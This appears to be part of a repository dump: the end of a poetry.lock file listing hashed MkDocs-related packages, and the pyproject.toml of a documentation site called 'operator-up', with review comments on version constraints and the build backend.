"sha256:a0b3b3e67606e04d13e777d13f3195402ea09e0c3ce279abc3666cac2c5b3a6d"}, 489 | ] 490 | mkdocs-material-extensions = [ 491 | {file = "mkdocs-material-extensions-1.0.3.tar.gz", hash = "sha256:bfd24dfdef7b41c312ede42648f9eb83476ea168ec163b613f9abd12bbfddba2"}, 492 | {file = "mkdocs_material_extensions-1.0.3-py3-none-any.whl", hash = "sha256:a82b70e533ce060b2a5d9eb2bc2e1be201cf61f901f93704b4acf6e3d5983a44"}, 493 | ] 494 | mkdocs-minify-plugin = [ 495 | {file = "mkdocs-minify-plugin-0.3.0.tar.gz", hash = "sha256:06fecd8ddb9cb90f30bcee2d94c3d4b46a090f403d7ff0edff089a435906c4ee"}, 496 | {file = "mkdocs_minify_plugin-0.3.0-py2-none-any.whl", hash = "sha256:9bac96276b1681debb3eb2cf5bae972586b4c1138e8d78ea63a984ea6276563d"}, 497 | ] 498 | packaging = [ 499 | {file = "packaging-21.3-py3-none-any.whl", hash = "sha256:ef103e05f519cdc783ae24ea4e2e0f508a9c99b2d4969652eed6a2e1ea5bd522"}, 500 | {file = "packaging-21.3.tar.gz", hash = "sha256:dd47c42927d89ab911e606518907cc2d3a1f38bbd026385970643f9c5b8ecfeb"}, 501 | ] 502 | pygments = [ 503 | {file = "Pygments-2.11.2-py3-none-any.whl", hash = "sha256:44238f1b60a76d78fc8ca0528ee429702aae011c265fe6a8dd8b63049ae41c65"}, 504 | {file = "Pygments-2.11.2.tar.gz", hash = "sha256:4e426f72023d88d03b2fa258de560726ce890ff3b630f88c21cbb8b2503b8c6a"}, 505 | ] 506 | pymdown-extensions = [ 507 | {file = "pymdown-extensions-9.2.tar.gz", hash = "sha256:ed8f69a18bc158f00cbf03abc536b88b6e541b7e699156501e767c48f81d8850"}, 508 | {file = "pymdown_extensions-9.2-py3-none-any.whl", hash = "sha256:f2fa7d9317c672a419868c893c20a28fb7ed7fc60d4ec4774c35e01398ab330c"}, 509 | ] 510 | pyparsing = [ 511 | {file = "pyparsing-3.0.7-py3-none-any.whl", hash = "sha256:a6c06a88f252e6c322f65faf8f418b16213b51bdfaece0524c1c1bc30c63c484"}, 512 | {file = "pyparsing-3.0.7.tar.gz", hash = "sha256:18ee9022775d270c55187733956460083db60b37d0d0fb357445f3094eed3eea"}, 513 | ] 514 | python-dateutil = [ 515 | {file = "python-dateutil-2.8.2.tar.gz", hash = 
"sha256:0123cacc1627ae19ddf3c27a5de5bd67ee4586fbdd6440d9748f8abb483d3e86"}, 516 | {file = "python_dateutil-2.8.2-py2.py3-none-any.whl", hash = "sha256:961d03dc3453ebbc59dbdea9e4e11c5651520a876d0f4db161e8674aae935da9"}, 517 | ] 518 | pytz = [ 519 | {file = "pytz-2021.3-py2.py3-none-any.whl", hash = "sha256:3672058bc3453457b622aab7a1c3bfd5ab0bdae451512f6cf25f64ed37f5b87c"}, 520 | {file = "pytz-2021.3.tar.gz", hash = "sha256:acad2d8b20a1af07d4e4c9d2e9285c5ed9104354062f275f3fcd88dcef4f1326"}, 521 | ] 522 | pyyaml = [ 523 | {file = "PyYAML-6.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:d4db7c7aef085872ef65a8fd7d6d09a14ae91f691dec3e87ee5ee0539d516f53"}, 524 | {file = "PyYAML-6.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:9df7ed3b3d2e0ecfe09e14741b857df43adb5a3ddadc919a2d94fbdf78fea53c"}, 525 | {file = "PyYAML-6.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:77f396e6ef4c73fdc33a9157446466f1cff553d979bd00ecb64385760c6babdc"}, 526 | {file = "PyYAML-6.0-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:a80a78046a72361de73f8f395f1f1e49f956c6be882eed58505a15f3e430962b"}, 527 | {file = "PyYAML-6.0-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:f84fbc98b019fef2ee9a1cb3ce93e3187a6df0b2538a651bfb890254ba9f90b5"}, 528 | {file = "PyYAML-6.0-cp310-cp310-win32.whl", hash = "sha256:2cd5df3de48857ed0544b34e2d40e9fac445930039f3cfe4bcc592a1f836d513"}, 529 | {file = "PyYAML-6.0-cp310-cp310-win_amd64.whl", hash = "sha256:daf496c58a8c52083df09b80c860005194014c3698698d1a57cbcfa182142a3a"}, 530 | {file = "PyYAML-6.0-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:897b80890765f037df3403d22bab41627ca8811ae55e9a722fd0392850ec4d86"}, 531 | {file = "PyYAML-6.0-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:50602afada6d6cbfad699b0c7bb50d5ccffa7e46a3d738092afddc1f9758427f"}, 532 | {file = 
"PyYAML-6.0-cp36-cp36m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:48c346915c114f5fdb3ead70312bd042a953a8ce5c7106d5bfb1a5254e47da92"}, 533 | {file = "PyYAML-6.0-cp36-cp36m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:98c4d36e99714e55cfbaaee6dd5badbc9a1ec339ebfc3b1f52e293aee6bb71a4"}, 534 | {file = "PyYAML-6.0-cp36-cp36m-win32.whl", hash = "sha256:0283c35a6a9fbf047493e3a0ce8d79ef5030852c51e9d911a27badfde0605293"}, 535 | {file = "PyYAML-6.0-cp36-cp36m-win_amd64.whl", hash = "sha256:07751360502caac1c067a8132d150cf3d61339af5691fe9e87803040dbc5db57"}, 536 | {file = "PyYAML-6.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:819b3830a1543db06c4d4b865e70ded25be52a2e0631ccd2f6a47a2822f2fd7c"}, 537 | {file = "PyYAML-6.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:473f9edb243cb1935ab5a084eb238d842fb8f404ed2193a915d1784b5a6b5fc0"}, 538 | {file = "PyYAML-6.0-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:0ce82d761c532fe4ec3f87fc45688bdd3a4c1dc5e0b4a19814b9009a29baefd4"}, 539 | {file = "PyYAML-6.0-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:231710d57adfd809ef5d34183b8ed1eeae3f76459c18fb4a0b373ad56bedcdd9"}, 540 | {file = "PyYAML-6.0-cp37-cp37m-win32.whl", hash = "sha256:c5687b8d43cf58545ade1fe3e055f70eac7a5a1a0bf42824308d868289a95737"}, 541 | {file = "PyYAML-6.0-cp37-cp37m-win_amd64.whl", hash = "sha256:d15a181d1ecd0d4270dc32edb46f7cb7733c7c508857278d3d378d14d606db2d"}, 542 | {file = "PyYAML-6.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:0b4624f379dab24d3725ffde76559cff63d9ec94e1736b556dacdfebe5ab6d4b"}, 543 | {file = "PyYAML-6.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:213c60cd50106436cc818accf5baa1aba61c0189ff610f64f4a3e8c6726218ba"}, 544 | {file = "PyYAML-6.0-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = 
"sha256:9fa600030013c4de8165339db93d182b9431076eb98eb40ee068700c9c813e34"}, 545 | {file = "PyYAML-6.0-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:277a0ef2981ca40581a47093e9e2d13b3f1fbbeffae064c1d21bfceba2030287"}, 546 | {file = "PyYAML-6.0-cp38-cp38-win32.whl", hash = "sha256:d4eccecf9adf6fbcc6861a38015c2a64f38b9d94838ac1810a9023a0609e1b78"}, 547 | {file = "PyYAML-6.0-cp38-cp38-win_amd64.whl", hash = "sha256:1e4747bc279b4f613a09eb64bba2ba602d8a6664c6ce6396a4d0cd413a50ce07"}, 548 | {file = "PyYAML-6.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:055d937d65826939cb044fc8c9b08889e8c743fdc6a32b33e2390f66013e449b"}, 549 | {file = "PyYAML-6.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:e61ceaab6f49fb8bdfaa0f92c4b57bcfbea54c09277b1b4f7ac376bfb7a7c174"}, 550 | {file = "PyYAML-6.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d67d839ede4ed1b28a4e8909735fc992a923cdb84e618544973d7dfc71540803"}, 551 | {file = "PyYAML-6.0-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:cba8c411ef271aa037d7357a2bc8f9ee8b58b9965831d9e51baf703280dc73d3"}, 552 | {file = "PyYAML-6.0-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:40527857252b61eacd1d9af500c3337ba8deb8fc298940291486c465c8b46ec0"}, 553 | {file = "PyYAML-6.0-cp39-cp39-win32.whl", hash = "sha256:b5b9eccad747aabaaffbc6064800670f0c297e52c12754eb1d976c57e4f74dcb"}, 554 | {file = "PyYAML-6.0-cp39-cp39-win_amd64.whl", hash = "sha256:b3d267842bf12586ba6c734f89d1f5b871df0273157918b0ccefa29deb05c21c"}, 555 | {file = "PyYAML-6.0.tar.gz", hash = "sha256:68fb519c14306fec9720a2a5b45bc9f0c8d1b9c72adf45c37baedfcd949c35a2"}, 556 | ] 557 | pyyaml-env-tag = [ 558 | {file = "pyyaml_env_tag-0.1-py3-none-any.whl", hash = "sha256:af31106dec8a4d68c60207c1886031cbf839b68aa7abccdb19868200532c2069"}, 559 | {file = "pyyaml_env_tag-0.1.tar.gz", hash = 
"sha256:70092675bda14fdec33b31ba77e7543de9ddc88f2e5b99160396572d11525bdb"}, 560 | ] 561 | six = [ 562 | {file = "six-1.16.0-py2.py3-none-any.whl", hash = "sha256:8abb2f1d86890a2dfb989f9a77cfcfd3e47c2a354b01111771326f8aa26e0254"}, 563 | {file = "six-1.16.0.tar.gz", hash = "sha256:1e61c37477a1626458e36f7b1d82aa5c9b094fa4802892072e49de9c60c4c926"}, 564 | ] 565 | smmap = [ 566 | {file = "smmap-5.0.0-py3-none-any.whl", hash = "sha256:2aba19d6a040e78d8b09de5c57e96207b09ed71d8e55ce0959eeee6c8e190d94"}, 567 | {file = "smmap-5.0.0.tar.gz", hash = "sha256:c840e62059cd3be204b0c9c9f74be2c09d5648eddd4580d9314c3ecde0b30936"}, 568 | ] 569 | typing-extensions = [ 570 | {file = "typing_extensions-4.1.1-py3-none-any.whl", hash = "sha256:21c85e0fe4b9a155d0799430b0ad741cdce7e359660ccbd8b530613e8df88ce2"}, 571 | {file = "typing_extensions-4.1.1.tar.gz", hash = "sha256:1a9462dcc3347a79b1f1c0271fbe79e844580bb598bafa1ed208b94da3cdcd42"}, 572 | ] 573 | watchdog = [ 574 | {file = "watchdog-2.1.6-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:9693f35162dc6208d10b10ddf0458cc09ad70c30ba689d9206e02cd836ce28a3"}, 575 | {file = "watchdog-2.1.6-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:aba5c812f8ee8a3ff3be51887ca2d55fb8e268439ed44110d3846e4229eb0e8b"}, 576 | {file = "watchdog-2.1.6-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:4ae38bf8ba6f39d5b83f78661273216e7db5b00f08be7592062cb1fc8b8ba542"}, 577 | {file = "watchdog-2.1.6-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:ad6f1796e37db2223d2a3f302f586f74c72c630b48a9872c1e7ae8e92e0ab669"}, 578 | {file = "watchdog-2.1.6-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:922a69fa533cb0c793b483becaaa0845f655151e7256ec73630a1b2e9ebcb660"}, 579 | {file = "watchdog-2.1.6-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:b2fcf9402fde2672545b139694284dc3b665fd1be660d73eca6805197ef776a3"}, 580 | {file = "watchdog-2.1.6-cp38-cp38-macosx_10_9_x86_64.whl", hash = 
"sha256:3386b367e950a11b0568062b70cc026c6f645428a698d33d39e013aaeda4cc04"}, 581 | {file = "watchdog-2.1.6-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:8f1c00aa35f504197561060ca4c21d3cc079ba29cf6dd2fe61024c70160c990b"}, 582 | {file = "watchdog-2.1.6-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:b52b88021b9541a60531142b0a451baca08d28b74a723d0c99b13c8c8d48d604"}, 583 | {file = "watchdog-2.1.6-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:8047da932432aa32c515ec1447ea79ce578d0559362ca3605f8e9568f844e3c6"}, 584 | {file = "watchdog-2.1.6-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:e92c2d33858c8f560671b448205a268096e17870dcf60a9bb3ac7bfbafb7f5f9"}, 585 | {file = "watchdog-2.1.6-pp37-pypy37_pp73-macosx_10_9_x86_64.whl", hash = "sha256:b7d336912853d7b77f9b2c24eeed6a5065d0a0cc0d3b6a5a45ad6d1d05fb8cd8"}, 586 | {file = "watchdog-2.1.6-py3-none-manylinux2014_aarch64.whl", hash = "sha256:cca7741c0fcc765568350cb139e92b7f9f3c9a08c4f32591d18ab0a6ac9e71b6"}, 587 | {file = "watchdog-2.1.6-py3-none-manylinux2014_armv7l.whl", hash = "sha256:25fb5240b195d17de949588628fdf93032ebf163524ef08933db0ea1f99bd685"}, 588 | {file = "watchdog-2.1.6-py3-none-manylinux2014_i686.whl", hash = "sha256:be9be735f827820a06340dff2ddea1fb7234561fa5e6300a62fe7f54d40546a0"}, 589 | {file = "watchdog-2.1.6-py3-none-manylinux2014_ppc64.whl", hash = "sha256:d0d19fb2441947b58fbf91336638c2b9f4cc98e05e1045404d7a4cb7cddc7a65"}, 590 | {file = "watchdog-2.1.6-py3-none-manylinux2014_ppc64le.whl", hash = "sha256:3becdb380d8916c873ad512f1701f8a92ce79ec6978ffde92919fd18d41da7fb"}, 591 | {file = "watchdog-2.1.6-py3-none-manylinux2014_s390x.whl", hash = "sha256:ae67501c95606072aafa865b6ed47343ac6484472a2f95490ba151f6347acfc2"}, 592 | {file = "watchdog-2.1.6-py3-none-manylinux2014_x86_64.whl", hash = "sha256:e0f30db709c939cabf64a6dc5babb276e6d823fd84464ab916f9b9ba5623ca15"}, 593 | {file = "watchdog-2.1.6-py3-none-win32.whl", hash = "sha256:e02794ac791662a5eafc6ffeaf9bcc149035a0e48eb0a9d40a8feb4622605a3d"}, 
594 | {file = "watchdog-2.1.6-py3-none-win_amd64.whl", hash = "sha256:bd9ba4f332cf57b2c1f698be0728c020399ef3040577cde2939f2e045b39c1e5"},
595 | {file = "watchdog-2.1.6-py3-none-win_ia64.whl", hash = "sha256:a0f1c7edf116a12f7245be06120b1852275f9506a7d90227648b250755a03923"},
596 | {file = "watchdog-2.1.6.tar.gz", hash = "sha256:a36e75df6c767cbf46f61a91c70b3ba71811dfa0aca4a324d9407a06a8b7a2e7"},
597 | ]
598 | wcmatch = [
599 | {file = "wcmatch-8.3-py3-none-any.whl", hash = "sha256:7141d2c85314253f16b38cb3d6cc0fb612918d407e1df3ccc2be7c86cc259c22"},
600 | {file = "wcmatch-8.3.tar.gz", hash = "sha256:371072912398af61d1e4e78609e18801c6faecd3cb36c54c82556a60abc965db"},
601 | ]
602 | zipp = [
603 | {file = "zipp-3.7.0-py3-none-any.whl", hash = "sha256:b47250dd24f92b7dd6a0a8fc5244da14608f3ca90a5efcd37a3b1642fac9a375"},
604 | {file = "zipp-3.7.0.tar.gz", hash = "sha256:9f50f446828eb9d45b267433fd3e9da8d801f614129124863f9c51ebceafb87d"},
605 | ]
606 |
--------------------------------------------------------------------------------
/pyproject.toml:
--------------------------------------------------------------------------------
1 | [tool.poetry]  # Project metadata for the documentation site; the only declared dependencies are MkDocs and its plugins.
2 | name = "operator-up"
3 | version = "0.1.0"
4 | description = "Helpful operator notes and techniques in actionable form"
5 | authors = ["Alexander Rymdeko-Harvey"]
6 |
7 | [tool.poetry.dependencies]  # Caret constraints are version ranges, not pins; the exact releases and the sha256 of each allowed artifact are recorded in poetry.lock, so that file has to stay committed and be the thing installs resolve from.
8 | python = "^3.7"  # NOTE(review): 3.7 no longer receives upstream security fixes; confirm whether this floor can be raised.
9 | mkdocs = "^1.2"
10 | mkdocs-material = "^5.1.5"
11 | mkdocs-minify-plugin = "^0.3.0"
12 | mkdocs-git-revision-date-localized-plugin = "^0.5.2"
13 | mkdocs-awesome-pages-plugin = "^2.2.1"
14 |
15 | [tool.poetry.dev-dependencies]  # No development-only dependencies are declared.
16 |
17 | [build-system]  # PEP 517 build settings; these requirements are not listed in the [tool.poetry.dependencies] table above.
18 | requires = ["poetry>=0.12"]  # NOTE(review): open-ended lower bound on the full poetry package, so a build pulls in whatever release is newest along with its dependency tree; poetry-core is the dedicated, smaller build-backend package. Confirm before switching.
19 | build-backend = "poetry.masonry.api"  # NOTE(review): backend path provided by the full poetry package; with poetry-core it is "poetry.core.masonry.api".
20 |
--------------------------------------------------------------------------------